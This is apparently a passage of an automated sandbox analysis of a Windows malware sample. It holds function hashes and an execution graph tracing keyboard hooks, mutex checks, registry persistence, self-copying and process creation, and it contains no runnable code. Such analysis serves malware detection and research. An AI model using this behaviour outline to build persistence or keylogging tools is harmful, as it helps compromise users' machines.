                                • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                APIs
                                  • Part of subcall function 004484CA: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046B780,00000010,0043A9DB), ref: 0044852C
                                  • Part of subcall function 004484CA: _free.LIBCMT ref: 0044853A
                                  • Part of subcall function 00448300: _free.LIBCMT ref: 00448322
                                • DeleteCriticalSection.KERNEL32(00545D10), ref: 0043A9F7
                                • _free.LIBCMT ref: 0043AA0B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$CriticalDeleteSection
                                • String ID: 0]T
                                • API String ID: 1906768660-3090778742
                                • Opcode ID: e5ac36b3ed681d96bb29fb15252be59f85a39ae6aa6e3a5f4908a70822c1effc
                                • Instruction ID: d49f9847c972b922b2a5bd31cb464d080f037d7424c3f130f1981fc4ee97ab75
                                • Opcode Fuzzy Hash: e5ac36b3ed681d96bb29fb15252be59f85a39ae6aa6e3a5f4908a70822c1effc
                                • Instruction Fuzzy Hash: 7EE0D8328001109FD620BB5BFC4591A33E49F0D355B02443EFC85D3261DA79EC948B4E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CommandLine
                                • String ID: %R
                                • API String ID: 3253501508-2309452963
                                • Opcode ID: cae20f9730f5ace7650722f8577f4badf597048a844bd8defe5601c9d896c31e
                                • Instruction ID: ed7793de650037ca68a065bd14f32765b676cca72e00cc30cceafd45c2a83d08
                                • Opcode Fuzzy Hash: cae20f9730f5ace7650722f8577f4badf597048a844bd8defe5601c9d896c31e
                                • Instruction Fuzzy Hash: A8B092788007008FCB108FB0B80C0143BA0B6182073C15176DC8EC3F22E7758008DF09
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                • GetLastError.KERNEL32 ref: 0043B4E9
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast
                                • String ID:
                                • API String ID: 1717984340-0
                                • Opcode ID: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                • Opcode Fuzzy Hash: b03ae9dac27993159e2f076845c08d8301cee77c5f079c52009939e8645c9409
                                • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                APIs
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                • SetLastError.KERNEL32(0000007F), ref: 004106DF
                                • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastRead
                                • String ID:
                                • API String ID: 4100373531-0
                                • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19

                                Execution Graph

                                Execution Coverage:4.5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:1.3%
                                Total number of Nodes:1556
                                Total number of Limit Nodes:52
                                execution_graph 44717 40932c 44720 4093ef 44717->44720 44719 40933d 44721 40940c 44720->44721 44722 40944f CallNextHookEx 44720->44722 44723 409417 44721->44723 44724 409438 44721->44724 44722->44719 44725 40942a 44723->44725 44726 40941c 44723->44726 44733 40a16d 44724->44733 44791 40a5ec 30 API calls 44725->44791 44726->44722 44790 40a592 36 API calls 44726->44790 44730 409428 44730->44722 44734 40a17c 44733->44734 44736 409444 44734->44736 44792 402073 44734->44792 44736->44722 44739 40a439 44736->44739 44740 40a453 44739->44740 44741 40a57c 44739->44741 44742 40a4d7 44740->44742 44743 40a459 44740->44743 44852 409468 44741->44852 44746 402073 28 API calls 44742->44746 44749 402073 28 API calls 44743->44749 44785 40a57a 44743->44785 44748 40a4e5 44746->44748 44750 402073 28 API calls 44748->44750 44751 40a481 44749->44751 44752 40a4f3 44750->44752 44857 43a2cf 43 API calls 44751->44857 44876 419bca 28 API calls 44752->44876 44755 40a503 44877 40a65a 31 API calls 44755->44877 44756 40a48f 44758 402073 28 API calls 44756->44758 44759 40a49f 44758->44759 44858 40826c 44759->44858 44760 40a516 44878 419bca 28 API calls 44760->44878 44764 40a524 44879 402f85 28 API calls 44764->44879 44768 40a52f 44880 402f85 28 API calls 44768->44880 44771 40a4bc 44873 401fb8 44771->44873 44772 40a539 44881 40962e 12 API calls 44772->44881 44776 40a541 44882 401ee9 44776->44882 44777 401fb8 11 API calls 44779 40a4ce 44777->44779 44782 401fb8 11 API calls 44779->44782 44781 401ee9 11 API calls 44783 40a553 44781->44783 44782->44785 44784 401ee9 11 API calls 44783->44784 44786 40a55c 44784->44786 44785->44722 44787 401ee9 11 API calls 44786->44787 44788 40a568 44787->44788 44789 401fb8 11 API calls 44788->44789 44789->44779 44790->44730 44791->44730 44793 40207b 44792->44793 44799 4023ae 44793->44799 44795 402086 44803 4024cd 44795->44803 44798 409609 29 API calls 44798->44736 44800 402408 44799->44800 44801 4023b8 44799->44801 44800->44795 44801->44800 44807 402787 11 API calls std::_Deallocate 44801->44807 44804 4024d9 44803->44804 44808 4024ea 44804->44808 44806 402091 44806->44798 44807->44800 44809 4024fa 44808->44809 44810 402500 44809->44810 44811 402515 44809->44811 44815 402549 44810->44815 44825 4028c8 44811->44825 44814 402513 44814->44806 44836 402868 44815->44836 44817 40255d 44818 402572 44817->44818 44819 402587 44817->44819 44841 402a14 22 API calls 44818->44841 44821 4028c8 28 API calls 44819->44821 44824 402585 44821->44824 44822 40257b 44842 4029ba 22 API calls 44822->44842 44824->44814 44826 4028d1 44825->44826 44827 402933 44826->44827 44828 4028db 44826->44828 44850 402884 22 API calls 44827->44850 44831 4028e4 44828->44831 44832 4028f7 44828->44832 44844 402c8e 44831->44844 44834 4028f5 44832->44834 44835 4023ae 11 API calls 44832->44835 44834->44814 44835->44834 44837 402870 44836->44837 44838 402878 44837->44838 44843 402c83 22 API calls 44837->44843 44838->44817 44841->44822 44842->44824 44845 402c98 __EH_prolog 44844->44845 44851 402e34 22 API calls 44845->44851 44847 4023ae 11 API calls 44849 402d72 44847->44849 44848 402d04 44848->44847 44849->44834 44851->44848 44886 434c30 44852->44886 44857->44756 44924 402a31 44858->44924 44860 40827c 44932 402035 44860->44932 44863 402e81 44864 402e90 44863->44864 44865 402ed2 44864->44865 44870 402ec7 44864->44870 44944 401f90 44865->44944 44867 402ed0 44868 402035 11 API calls 44867->44868 44869 402ee9 44868->44869 44872 409609 29 API calls 44869->44872 44943 403345 28 API calls 44870->44943 44872->44771 44874 4023ae 11 API calls 44873->44874 44875 401fc1 44874->44875 44875->44777 44876->44755 44877->44760 44878->44764 44879->44768 44880->44772 44881->44776 44883 402232 11 API calls 44882->44883 44884 401ef2 44883->44884 44884->44781 44885 40962e 12 API calls 44885->44785 44887 409489 6 API calls 44886->44887 44888 40415e 44887->44888 44889 404166 44888->44889 44894 402232 44889->44894 44891 404171 44898 40419c 44891->44898 44895 40228c 44894->44895 44896 40223c 44894->44896 44895->44891 44896->44895 44902 402759 11 API calls std::_Deallocate 44896->44902 44899 4041a8 44898->44899 44903 4041b9 44899->44903 44901 40417c 44901->44885 44902->44895 44904 4041c9 44903->44904 44905 4041e6 44904->44905 44907 4041cf 44904->44907 44920 4027c6 28 API calls 44905->44920 44910 404247 44907->44910 44909 4041e4 44909->44901 44911 402868 22 API calls 44910->44911 44912 40425b 44911->44912 44913 404270 44912->44913 44914 404285 44912->44914 44921 4042bf 22 API calls 44913->44921 44923 4027c6 28 API calls 44914->44923 44917 404279 44922 402c28 22 API calls 44917->44922 44919 404283 44919->44909 44920->44909 44921->44917 44922->44919 44923->44919 44925 402a3b 44924->44925 44926 402a82 44925->44926 44927 402a4c 44925->44927 44938 402884 22 API calls 44926->44938 44929 4028c8 28 API calls 44927->44929 44931 402a5e 44927->44931 44929->44931 44931->44860 44933 402041 44932->44933 44934 4023ae 11 API calls 44933->44934 44935 40205b 44934->44935 44939 40265a 44935->44939 44940 40266b 44939->44940 44941 4023ae 11 API calls 44940->44941 44942 40206d 44941->44942 44942->44863 44943->44867 44947 4025d0 44944->44947 44946 401f9d 44946->44867 44948 402868 22 API calls 44947->44948 44949 4025e2 44948->44949 44950 402652 44949->44950 44951 402609 44949->44951 44956 402884 22 API calls 44950->44956 44953 4028c8 28 API calls 44951->44953 44955 40261b 44951->44955 44953->44955 44955->44946 44957 40163e 44958 401646 44957->44958 44959 401649 44957->44959 44960 401688 44959->44960 44962 401676 44959->44962 44961 43229f new 22 API calls 44960->44961 44963 40167c 44961->44963 44965 43229f 44962->44965 44968 4322a4 44965->44968 44967 4322d0 44967->44963 44968->44967 44972 439adb 44968->44972 44979 440480 7 API calls 2 library calls 44968->44979 44980 4329bd RaiseException Concurrency::cancel_current_task __CxxThrowException@8 44968->44980 44981 43301b RaiseException Concurrency::cancel_current_task __CxxThrowException@8 44968->44981 44977 443649 ___crtLCMapStringA 44972->44977 44973 443687 44983 43ad91 20 API calls _free 44973->44983 44974 443672 RtlAllocateHeap 44976 443685 44974->44976 44974->44977 44976->44968 44977->44973 44977->44974 44982 440480 7 API calls 2 library calls 44977->44982 44979->44968 44982->44977 44983->44976 44984 43263c 44985 432648 ___FrameUnwindToState 44984->44985 45011 43234b 44985->45011 44987 43264f 44989 432678 44987->44989 45278 4327ae IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 44987->45278 44997 4326b7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 44989->44997 45279 441763 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 44989->45279 44991 432691 44992 432697 ___FrameUnwindToState 44991->44992 45280 441707 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 44991->45280 44994 432717 45022 4328c9 44994->45022 44997->44994 45281 4408e7 35 API calls 4 library calls 44997->45281 45012 432354 45011->45012 45286 4329da IsProcessorFeaturePresent 45012->45286 45014 432360 45287 436cd1 10 API calls 4 library calls 45014->45287 45016 432365 45021 432369 45016->45021 45288 4415bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45016->45288 45018 432380 45018->44987 45019 432372 45019->45018 45289 436cfa 8 API calls 3 library calls 45019->45289 45021->44987 45023 434c30 ___scrt_fastfail 45022->45023 45024 4328dc GetStartupInfoW 45023->45024 45025 43271d 45024->45025 45026 4416b4 45025->45026 45290 44c239 45026->45290 45028 432726 45031 40d3f0 45028->45031 45029 4416bd 45029->45028 45294 443d25 35 API calls 45029->45294 45296 41a8da LoadLibraryA GetProcAddress 45031->45296 45033 40d40c 45303 40dd83 45033->45303 45035 40d415 45318 4020d6 45035->45318 45038 4020d6 28 API calls 45039 40d433 45038->45039 45324 419d87 45039->45324 45043 40d445 45350 401e6d 45043->45350 45045 40d44e 45046 40d461 45045->45046 45047 40d4b8 45045->45047 45777 40e609 95 API calls 45046->45777 45356 401e45 45047->45356 45050 40d4c6 45054 401e45 22 API calls 45050->45054 45051 40d473 45052 401e45 22 API calls 45051->45052 45053 40d47f 45052->45053 45778 40f98d 36 API calls __EH_prolog 45053->45778 45055 40d4e5 45054->45055 45361 4052fe 45055->45361 45058 40d4f4 45366 408209 45058->45366 45059 40d491 45779 40e5ba 77 API calls 45059->45779 45063 40d49a 45780 40dd70 70 API calls 45063->45780 45068 401fb8 11 API calls 45070 40d517 45068->45070 45072 401fb8 11 API calls 45070->45072 45073 40d520 45072->45073 45074 401e45 22 API calls 45073->45074 45075 40d529 45074->45075 45380 401fa0 45075->45380 45077 40d534 45078 401e45 22 API calls 45077->45078 45079 40d54f 45078->45079 45080 401e45 22 API calls 45079->45080 45081 40d569 45080->45081 45082 40d5cf 45081->45082 45384 40822a 45081->45384 45083 401e45 22 API calls 45082->45083 45090 40d5dc 45083->45090 45085 40d594 45086 401fc2 28 API calls 45085->45086 45087 40d5a0 45086->45087 45088 401fb8 11 API calls 45087->45088 45091 40d5a9 45088->45091 45089 40d650 45094 40d660 CreateMutexA GetLastError 45089->45094 45090->45089 45092 401e45 22 API calls 45090->45092 45389 411f34 RegOpenKeyExA 45091->45389 45093 40d5f5 45092->45093 45100 40d5fc OpenMutexA 45093->45100 45095 40d991 45094->45095 45096 40d67f GetModuleFileNameW 45094->45096 45098 401fb8 11 API calls 45095->45098 45392 4192ae 45096->45392 45125 40d99a ___scrt_fastfail 45098->45125 45101 40d622 45100->45101 45102 40d60f WaitForSingleObject CloseHandle 45100->45102 45107 411f34 3 API calls 45101->45107 45102->45101 45105 40d6a0 45108 40d6f5 45105->45108 45109 401e45 22 API calls 45105->45109 45106 40dd0f 45792 41239a 30 API calls 45106->45792 45114 40d63b 45107->45114 45111 401e45 22 API calls 45108->45111 45119 40d6bf 45109->45119 45117 40d720 45111->45117 45112 40dd22 45793 410eda 65 API calls ___scrt_fastfail 45112->45793 45114->45089 45781 41239a 30 API calls 45114->45781 45115 40dcfa 45120 402073 28 API calls 45115->45120 45146 40dd6a 45115->45146 45116 40d731 45122 401e45 22 API calls 45116->45122 45117->45116 45419 40e501 45117->45419 45119->45108 45123 40d6f7 45119->45123 45129 40d6db 45119->45129 45124 40dd3a 45120->45124 45132 40d73a 45122->45132 45782 411eea RegOpenKeyExA RegQueryValueExA RegCloseKey 45123->45782 45693 4052dd 45124->45693 45786 4120e8 RegOpenKeyExA 45125->45786 45128 40dd4a 45130 402073 28 API calls 45128->45130 45129->45108 45409 4067a0 45129->45409 45134 40dd59 45130->45134 45139 401e45 22 API calls 45132->45139 45137 4194da 79 API calls 45134->45137 45135 40d70d 45135->45108 45138 40d712 45135->45138 45136 40d9ec 45140 401e45 22 API calls 45136->45140 45141 40dd5e 45137->45141 45783 4066a6 59 API calls 45138->45783 45143 40d755 45139->45143 45144 40da10 45140->45144 45145 401fb8 11 API calls 45141->45145 45148 401e45 22 API calls 45143->45148 45150 402073 28 API calls 45144->45150 45145->45146 45695 413980 45146->45695 45149 40d76f 45148->45149 45153 401e45 22 API calls 45149->45153 45152 40da22 45150->45152 45151 40dd6f 45602 41215f RegCreateKeyA 45152->45602 45154 40d789 45153->45154 45158 401e45 22 API calls 45154->45158 45157 401e45 22 API calls 45159 40da44 45157->45159 45163 40d7a3 45158->45163 45608 439867 45159->45608 45162 40d810 45162->45125 45167 401e45 22 API calls 45162->45167 45201 40d89f ___scrt_fastfail 45162->45201 45163->45162 45165 401e45 22 API calls 45163->45165 45164 40da61 45789 41aa4f 82 API calls ___scrt_fastfail 45164->45789 45173 40d7b8 _wcslen 45165->45173 45166 40da7e 45169 402073 28 API calls 45166->45169 45170 40d831 45167->45170 45172 40da8d 45169->45172 45176 401e45 22 API calls 45170->45176 45171 40da70 CreateThread 45171->45166 46638 41b212 10 API calls 45171->46638 45174 402073 28 API calls 45172->45174 45173->45162 45179 401e45 22 API calls 45173->45179 45175 40da9c 45174->45175 45612 4194da 45175->45612 45180 40d843 45176->45180 45182 40d7d3 45179->45182 45184 401e45 22 API calls 45180->45184 45181 401e45 22 API calls 45183 40daad 45181->45183 45185 401e45 22 API calls 45182->45185 45187 401e45 22 API calls 45183->45187 45186 40d855 45184->45186 45188 40d7e8 45185->45188 45190 401e45 22 API calls 45186->45190 45189 40dabf 45187->45189 45422 40c5ed 45188->45422 45193 401e45 22 API calls 45189->45193 45191 40d87e 45190->45191 45197 401e45 22 API calls 45191->45197 45195 40dad5 45193->45195 45202 401e45 22 API calls 45195->45202 45196 401ef3 28 API calls 45198 40d807 45196->45198 45199 40d88f 45197->45199 45200 401ee9 11 API calls 45198->45200 45480 40b871 45199->45480 45200->45162 45592 412338 45201->45592 45203 40daf5 45202->45203 45207 439867 39 API calls 45203->45207 45206 40d942 ctype 45210 401e45 22 API calls 45206->45210 45208 40db02 45207->45208 45209 401e45 22 API calls 45208->45209 45211 40db0d 45209->45211 45212 40d959 45210->45212 45213 401e45 22 API calls 45211->45213 45212->45136 45214 40d96d 45212->45214 45215 40db1e 45213->45215 45216 401e45 22 API calls 45214->45216 45636 408f1f 45215->45636 45217 40d976 45216->45217 45784 419bca 28 API calls 45217->45784 45220 40d982 45785 40de34 98 API calls 45220->45785 45223 40d987 45223->45095 45223->45136 45224 401e45 22 API calls 45225 40db3c 45224->45225 45226 40db83 45225->45226 45227 40db4a 45225->45227 45229 401e45 22 API calls 45226->45229 45228 43229f new 22 API calls 45227->45228 45230 40db53 45228->45230 45231 40db91 45229->45231 45232 401e45 22 API calls 45230->45232 45234 40dbd9 45231->45234 45235 40db9c 45231->45235 45233 40db65 45232->45233 45237 40db6c CreateThread 45233->45237 45236 401e45 22 API calls 45234->45236 45238 43229f new 22 API calls 45235->45238 45239 40dbe2 45236->45239 45237->45226 46639 417f6a 107 API calls __EH_prolog 45237->46639 45240 40dba5 45238->45240 45243 40dc4c 45239->45243 45244 40dbed 45239->45244 45241 401e45 22 API calls 45240->45241 45242 40dbb6 45241->45242 45245 40dbbd CreateThread 45242->45245 45246 401e45 22 API calls 45243->45246 45247 401e45 22 API calls 45244->45247 45245->45234 46641 417f6a 107 API calls __EH_prolog 45245->46641 45248 40dc55 45246->45248 45249 40dbfc 45247->45249 45250 40dc60 45248->45250 45251 40dc99 45248->45251 45252 401e45 22 API calls 45249->45252 45254 401e45 22 API calls 45250->45254 45673 4195f8 GetComputerNameExW GetUserNameW 45251->45673 45255 40dc11 45252->45255 45257 40dc69 45254->45257 45790 40c5a1 32 API calls 45255->45790 45261 401e45 22 API calls 45257->45261 45264 40dc7e 45261->45264 45262 40dc24 45265 401ef3 28 API calls 45262->45265 45263 401ee9 11 API calls 45266 40dcb6 45263->45266 45274 439867 39 API calls 45264->45274 45269 40dc30 45265->45269 45267 40dcc1 SetProcessDEPPolicy 45266->45267 45268 40dcc4 CreateThread 45266->45268 45267->45268 45270 40dce5 45268->45270 45271 40dcd9 CreateThread 45268->45271 46611 40e18d 45268->46611 45272 401ee9 11 API calls 45269->45272 45270->45115 45273 40dcee CreateThread 45270->45273 45271->45270 46507 410b5c GetCurrentProcessId 45271->46507 45275 40dc39 CreateThread 45272->45275 45273->45115 46499 411140 45273->46499 45276 40dc8b 45274->45276 45275->45243 46640 401bc9 49 API calls 45275->46640 45791 40b0a3 7 API calls 45276->45791 45278->44987 45279->44991 45280->44997 45281->44994 45286->45014 45287->45016 45288->45019 45289->45021 45291 44c24b 45290->45291 45292 44c242 45290->45292 45291->45029 45295 44c138 48 API calls 4 library calls 45292->45295 45294->45029 45295->45291 45297 41a919 LoadLibraryA GetProcAddress 45296->45297 45298 41a909 GetModuleHandleA GetProcAddress 45296->45298 45299 41a947 GetModuleHandleA GetProcAddress 45297->45299 45300 41a937 GetModuleHandleA GetProcAddress 45297->45300 45298->45297 45301 41a973 24 API calls 45299->45301 45302 41a95f GetModuleHandleA GetProcAddress 45299->45302 45300->45299 45301->45033 45302->45301 45794 419493 FindResourceA 45303->45794 45306 439adb _Yarn 21 API calls 45307 40ddad _Yarn 45306->45307 45797 402097 45307->45797 45310 401fc2 28 API calls 45311 40ddd3 45310->45311 45312 401fb8 11 API calls 45311->45312 45313 40dddc 45312->45313 45314 439adb _Yarn 21 API calls 45313->45314 45315 40dded _Yarn 45314->45315 45803 4062ee 45315->45803 45317 40de20 45317->45035 45319 4020ec 45318->45319 45320 4023ae 11 API calls 45319->45320 45321 402106 45320->45321 45322 402549 28 API calls 45321->45322 45323 402114 45322->45323 45323->45038 45806 4020bf 45324->45806 45326 419d9a 45330 419e0c 45326->45330 45338 401fc2 28 API calls 45326->45338 45341 401fb8 11 API calls 45326->45341 45345 419e0a 45326->45345 45810 404182 28 API calls 45326->45810 45811 41ab9a 45326->45811 45327 401fb8 11 API calls 45328 419e3c 45327->45328 45329 401fb8 11 API calls 45328->45329 45331 419e44 45329->45331 45822 404182 28 API calls 45330->45822 45334 401fb8 11 API calls 45331->45334 45336 40d43c 45334->45336 45335 419e18 45337 401fc2 28 API calls 45335->45337 45346 40e563 45336->45346 45339 419e21 45337->45339 45338->45326 45340 401fb8 11 API calls 45339->45340 45342 419e29 45340->45342 45341->45326 45343 41ab9a 28 API calls 45342->45343 45343->45345 45345->45327 45347 40e56f 45346->45347 45349 40e576 45346->45349 45848 402143 11 API calls 45347->45848 45349->45043 45351 402143 45350->45351 45355 40217f 45351->45355 45849 402710 11 API calls 45351->45849 45353 402164 45850 4026f2 11 API calls std::_Deallocate 45353->45850 45355->45045 45357 401e4d 45356->45357 45358 401e55 45357->45358 45851 402138 22 API calls 45357->45851 45358->45050 45362 4020bf 11 API calls 45361->45362 45363 40530a 45362->45363 45852 403280 45363->45852 45365 405326 45365->45058 45856 4051cf 45366->45856 45368 408217 45369 402035 11 API calls 45368->45369 45370 408226 45369->45370 45371 401fc2 45370->45371 45372 401fd1 45371->45372 45379 402019 45371->45379 45373 4023ae 11 API calls 45372->45373 45374 401fda 45373->45374 45375 401ff5 45374->45375 45376 40201c 45374->45376 45872 403078 28 API calls 45375->45872 45377 40265a 11 API calls 45376->45377 45377->45379 45379->45068 45381 401fb2 45380->45381 45382 401fa9 45380->45382 45381->45077 45873 4025c0 28 API calls 45382->45873 45385 4020bf 11 API calls 45384->45385 45386 408236 45385->45386 45387 403280 28 API calls 45386->45387 45388 408253 45387->45388 45388->45085 45390 40d5c5 45389->45390 45391 411f5e RegQueryValueExA RegCloseKey 45389->45391 45390->45082 45390->45106 45391->45390 45874 419f23 45392->45874 45397 401fc2 28 API calls 45398 4192ea 45397->45398 45399 401fb8 11 API calls 45398->45399 45400 4192f2 45399->45400 45401 411f91 31 API calls 45400->45401 45403 419348 45400->45403 45402 41931b 45401->45402 45404 419326 StrToIntA 45402->45404 45403->45105 45405 41933d 45404->45405 45406 419334 45404->45406 45408 401fb8 11 API calls 45405->45408 45883 41accf 22 API calls 45406->45883 45408->45403 45410 4067c0 ___scrt_fastfail 45409->45410 45411 4120e8 3 API calls 45410->45411 45412 4067f9 45411->45412 45413 406836 45412->45413 45414 402073 28 API calls 45412->45414 45413->45108 45415 406813 45414->45415 45416 41215f 14 API calls 45415->45416 45417 406822 45416->45417 45884 41239a 30 API calls 45417->45884 45420 40e519 ___scrt_fastfail 45419->45420 45421 40e528 CreateProcessA CloseHandle CloseHandle 45420->45421 45421->45116 45885 401f66 45422->45885 45425 40c629 45889 41959f 29 API calls 45425->45889 45426 40c65e 45429 419f23 2 API calls 45426->45429 45427 40c752 GetLongPathNameW 45431 40415e 28 API calls 45427->45431 45428 40c61f 45428->45427 45432 40c663 45429->45432 45434 40c767 45431->45434 45435 40c667 45432->45435 45436 40c6b9 45432->45436 45433 40c632 45437 401ef3 28 API calls 45433->45437 45438 40415e 28 API calls 45434->45438 45440 40415e 28 API calls 45435->45440 45439 40415e 28 API calls 45436->45439 45441 40c63c 45437->45441 45442 40c776 45438->45442 45443 40c6c7 45439->45443 45444 40c675 45440->45444 45445 401ee9 11 API calls 45441->45445 45892 40c7f9 28 API calls 45442->45892 45449 40415e 28 API calls 45443->45449 45450 40415e 28 API calls 45444->45450 45445->45428 45447 40c789 45893 402f85 28 API calls 45447->45893 45452 40c6dd 45449->45452 45453 40c68b 45450->45453 45451 40c794 45894 402f85 28 API calls 45451->45894 45891 402f85 28 API calls 45452->45891 45890 402f85 28 API calls 45453->45890 45457 40c79e 45461 401ee9 11 API calls 45457->45461 45458 40c6e8 45462 401ef3 28 API calls 45458->45462 45459 40c696 45460 401ef3 28 API calls 45459->45460 45464 40c6a1 45460->45464 45465 40c7a8 45461->45465 45463 40c6f3 45462->45463 45466 401ee9 11 API calls 45463->45466 45467 401ee9 11 API calls 45464->45467 45468 401ee9 11 API calls 45465->45468 45470 40c6fc 45466->45470 45471 40c6aa 45467->45471 45469 40c7b1 45468->45469 45472 401ee9 11 API calls 45469->45472 45473 401ee9 11 API calls 45470->45473 45474 401ee9 11 API calls 45471->45474 45475 40c7ba 45472->45475 45473->45441 45474->45441 45476 401ee9 11 API calls 45475->45476 45477 40c7c3 45476->45477 45478 401ee9 11 API calls 45477->45478 45479 40c7cc 45478->45479 45479->45196 45481 40b887 _wcslen 45480->45481 45482 40b8e2 45481->45482 45484 40b891 45481->45484 45483 40c5ed 32 API calls 45482->45483 45485 40b8f7 45483->45485 45486 40b89a CreateDirectoryW 45484->45486 45487 401ef3 28 API calls 45485->45487 45895 4081c7 45486->45895 45489 40b8dc 45487->45489 45492 401ee9 11 API calls 45489->45492 45490 40b8b9 45900 402ff4 45490->45900 45497 40b90e 45492->45497 45494 401ef3 28 API calls 45495 40b8d3 45494->45495 45496 401ee9 11 API calls 45495->45496 45496->45489 45498 40b941 45497->45498 45499 40b927 45497->45499 45500 40b94a CopyFileW 45498->45500 45905 40b77f 45499->45905 45501 40b9f5 45500->45501 45505 40b95c _wcslen 45500->45505 45504 40b77f 31 API calls 45501->45504 45503 40b938 45503->45201 45506 40ba06 45504->45506 45505->45501 45507 40b9b9 45505->45507 45508 40b979 45505->45508 45509 40ba3e 45506->45509 45514 40ba1b SetFileAttributesW 45506->45514 45510 40c5ed 32 API calls 45507->45510 45511 40c5ed 32 API calls 45508->45511 45517 40415e 28 API calls 45509->45517 45512 40b9be 45510->45512 45513 40b984 45511->45513 45515 401ef3 28 API calls 45512->45515 45516 402ff4 28 API calls 45513->45516 45527 40ba2a _wcslen 45514->45527 45518 40b9b7 45515->45518 45519 40b990 45516->45519 45520 40ba58 45517->45520 45521 401ee9 11 API calls 45518->45521 45522 402ff4 28 API calls 45519->45522 45523 402ff4 28 API calls 45520->45523 45524 40b9d0 45521->45524 45525 40b99c 45522->45525 45526 40ba63 45523->45526 45532 40b9d9 CopyFileW 45524->45532 45528 401ef3 28 API calls 45525->45528 45530 401ee9 11 API calls 45526->45530 45527->45509 45531 40ba3b SetFileAttributesW 45527->45531 45529 40b9a5 45528->45529 45533 401ee9 11 API calls 45529->45533 45534 40ba6d 45530->45534 45531->45509 45532->45501 45535 40b9e6 45532->45535 45536 40b9ae 45533->45536 45537 